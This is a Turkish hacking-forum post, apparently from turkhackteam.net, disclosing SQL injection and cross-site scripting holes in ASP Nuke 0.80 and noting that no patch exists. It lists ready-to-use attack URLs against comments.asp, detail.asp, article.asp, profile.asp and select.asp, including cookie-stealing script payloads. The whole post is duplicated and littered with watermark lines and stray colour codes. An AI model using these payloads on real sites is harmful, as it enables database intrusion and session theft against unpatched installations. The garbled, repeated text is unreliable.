Evet Açığın Anlatımına Başlayalım /turkhackteam.net se-zer
Etkisi:Uzaktan SQL komutları çalıştırma /turkhackteam.net se-zer
Etkilenen sürüm:0.80 /turkhackteam.net se-zer
ASP Nuke yazılımında SQL Injection ve XSS (cross-site scripting) açıkları tespit edildi.profile.asp ve select.asp script’leri kullanıcının girdiği HTML kodlarını düzgün olarak filtrelemiyor.Bu açık sayesinde uzaktaki bir kullanıcı SQL komutları çalıştırabiliyor ve cross-site scripting saldırısı gerçekleştirebiliyor.
ör: /turkhackteam.net se-zer
color=#740000http://[target]/module/support/task/comments.asp?taskid=’SQL_INJECTION
color=#740000http://target /module/support/task/detail.asp?taskid=’SQL_INJECTION
http://[target]/module/article/article/article.asp?articleid=’SQL_INJECTION
color=#740000http://target /module/discuss/forum/profile.asp?topicid=1&thradid=346& amp;username=’“><s cript>alert(********.cookie)</script>
color=#740000http://target /module/support/language/select.asp?code=’“>********** alert(********.cookie)</script> /turkhackteam.net se-zer
Bu Acık İçin Henüz bir yama yada yeni sürüm çıkmadı. /turkhackteam.net se-zer
/turkhackteam.net se-zer
Etkisi:Uzaktan SQL komutları çalıştırma /turkhackteam.net se-zer
Etkilenen sürüm:0.80 /turkhackteam.net se-zer
ASP Nuke yazılımında SQL Injection ve XSS (cross-site scripting) açıkları tespit edildi.profile.asp ve select.asp script’leri kullanıcının girdiği HTML kodlarını düzgün olarak filtrelemiyor.Bu açık sayesinde uzaktaki bir kullanıcı SQL komutları çalıştırabiliyor ve cross-site scripting saldırısı gerçekleştirebiliyor.
ör: /turkhackteam.net se-zer
color=#740000http://[target]/module/support/task/comments.asp?taskid=’SQL_INJECTION
color=#740000http://target /module/support/task/detail.asp?taskid=’SQL_INJECTION
http://[target]/module/article/article/article.asp?articleid=’SQL_INJECTION
color=#740000http://target /module/discuss/forum/profile.asp?topicid=1&thradid=346& amp;username=’“><s cript>alert(********.cookie)</script>
color=#740000http://target /module/support/language/select.asp?code=’“>********** alert(********.cookie)</script> /turkhackteam.net se-zer
Bu Acık İçin Henüz bir yama yada yeni sürüm çıkmadı. /turkhackteam.net se-zer
/turkhackteam.net se-zer